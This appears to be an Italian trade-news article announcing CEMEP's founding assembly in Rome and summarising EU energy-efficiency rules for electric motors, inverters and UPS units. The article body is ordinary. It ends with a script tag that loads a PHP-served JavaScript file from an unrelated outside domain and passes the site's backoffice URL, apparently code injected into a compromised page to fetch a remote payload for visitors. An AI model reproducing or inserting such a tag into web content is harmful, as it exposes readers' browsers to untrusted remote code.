Il CEMEP, l’Associazione Italiana di Costruttori di Motori, Inverter e UPS, ha organizzato un’Assemblea costitutiva per il prossimo 15 novembre, presso l’Hotel Mediterraneo, in via Cavour 15 a Roma, dalle ore 11.30 alle ore 13. Nel corso dell’incontro è prevista una sessione dedicata all’approfondimento dei temi dell’efficienza energetica, della sorveglianza del mercato e dell’innovazione tecnologica nel settore dei motori elettrici, dei drive e degli UPS.
Temi insomma molto caldi: l’Europa si sta, infatti, adeguando a degli standard di efficienza energetica sempre più elevati anche nell’industria, come dimostra l’ultima Direttiva emanata su questo tema, la 2012/27/UE. Alcune apparecchiature tecnologicamente avanzate come i motori, gli inverter e gli UPS stanno innovandosi nella ricerca di consumi sempre minori a fronte di performance che devono invece aumentare. Questo significa un grande sforzo in termini di investimenti in ricerca e innovazione da parte delle imprese ANIE che producono questi apparecchi.
Dal 1° gennaio 2015, inoltre, i motori con una potenza nominale di 7,5 - 375 kW dovranno soddisfare il livello di efficienza IE3 o, in alternativa, IE2 ed essere dotati di un variatore di velocità (inverter), come prescritto da un regolamento comunitario che stabilisce i requisiti di progettazione ecocompatibile per l'immissione sul mercato e per la messa in servizio dei motori elettrici. L'industria italiana, da sempre all'avanguardia nel settore elettrico, si è già adeguata, in anticipo, alle regole comunitarie e sta collaborando con le Istituzioni affinché l'immissione nel mercato dei motori elettrici sia sufficientemente monitorata in modo da garantire gli standard di efficienza energetica individuati dal regolamento europeo.
Seguirà lunch.
<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2013-10-10&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&cb=0.29059587012370414" type="text/javascript"></script>